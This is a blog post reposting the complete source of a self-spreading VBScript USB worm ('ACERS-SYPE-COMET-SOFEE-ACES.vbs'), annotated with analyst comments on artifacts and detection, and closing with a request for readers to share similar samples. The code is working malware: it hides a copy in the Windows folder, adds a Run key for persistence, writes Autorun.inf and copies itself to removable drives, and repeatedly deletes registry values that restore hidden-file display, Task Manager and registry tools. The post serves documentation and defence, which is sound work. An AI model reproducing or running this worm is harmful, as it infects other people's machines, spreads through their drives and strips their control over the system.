I got this code from the virus named in the title a long time ago; it was stuck on my previous Blogger account, so I couldn't edit it.
Anyway here is the code reposted from
' Analysis notes: self-copying VBScript that persists on the host and spreads through removable drives.
' Artifacts visible in this listing that a responder can check for:
'   - <Windows folder>\ACERS-SYPE-COMET-SOFEE-ACES.vbs with attributes 39 (read-only + hidden + system + archive)
'   - the Run value HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe launching wscript.exe on that file
'   - Autorun.inf plus a copy of the script in the root of each removable drive, both with attributes 39
'   - a wscript.exe process that deletes the same seven HKCU Explorer/Policies values every 10 seconds
' Every error is suppressed for the whole script, so a step that fails (e.g. for lack of rights) is skipped silently.
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")
' Special folder 0 is the Windows directory.
win = fso.GetSpecialFolder(0)
' Full path of the script file currently being executed.
tf = WScript.ScriptFullName
x = LCase(tf)
' Mid(x, 4) drops the "X:\" prefix, so this tests for a copy running from a drive root and,
' if matched, opens an Explorer window on that drive.
' NOTE(review): x has been lower-cased while the literal is upper-case, so as written the
' comparison does not look like it can match; confirm before relying on this as an indicator.
If Mid(x, 4) = "ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If
' Read the script's own source (mode 1 = for reading) into scrText; this text is what gets copied.
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
' ax records whether the Windows-folder copy already existed before this run.
ax = fso.FileExists(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
' (Re)write the copy in the Windows folder, overwriting any existing file.
Set myFile = fso.CreateTextFile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
' 39 = 1 + 2 + 4 + 32: read-only, hidden, system, archive.
fAttr.Attributes=39
' Persistence: a machine-wide Run value named "autoMe" starts the copy at logon.
' NOTE(review): writing under HKLM presumably needs administrative rights; a failure here is
' masked by On Error Resume Next, so absence of the value does not prove the host is clean.
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""
' First run on this host (no earlier copy): start the installed copy as a separate wscript.exe process.
If ax = false Then wscr.Run "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""
' Endless loop: one pass over all drives plus the registry deletions, then a 10-second sleep.
While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
' DriveType 1 = removable; drive A: is excluded.
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
' An existing Autorun.inf has its attributes reset to 32 (archive only) and is then force-deleted.
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
' A new Autorun.inf is written whose open and shell\Open\Command entries run the script through wscript.exe.
' Detection: an Autorun.inf on removable media that references wscript.exe and a .vbs file.
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Command=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39
' The script source is copied to the drive root and given attributes 39 as well.
Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39
End If
Next
' Deletes seven per-user (HKCU) values on every pass: three Explorer view settings and four policy values.
' NOTE(review): with the values gone Windows presumably falls back to its defaults, which would keep
' hidden/system files out of view and drop a per-user NoDriveTypeAutoRun restriction; confirm on the
' affected Windows version. Only HKCU is touched here, so a machine-wide autorun policy is not
' changed by this code.
' Detection: the same values being deleted again shortly after an administrator restores them.
With wscr
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
End With
' An instance that is not the Windows-folder copy exits once the drive it was started from is no longer ready.
If tf <> win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
' Cleanup has to end the running wscript.exe first: while it runs, this loop rewrites the drive copies every 10 seconds.
WScript.Sleep 10000
Wend
In our school it was already removed, but it was replaced with another script with the same content.
The file is pepito.vbs.
If you find something like this, try posting it here so we can document the activity and further strengthen the defense against these annoying viruses.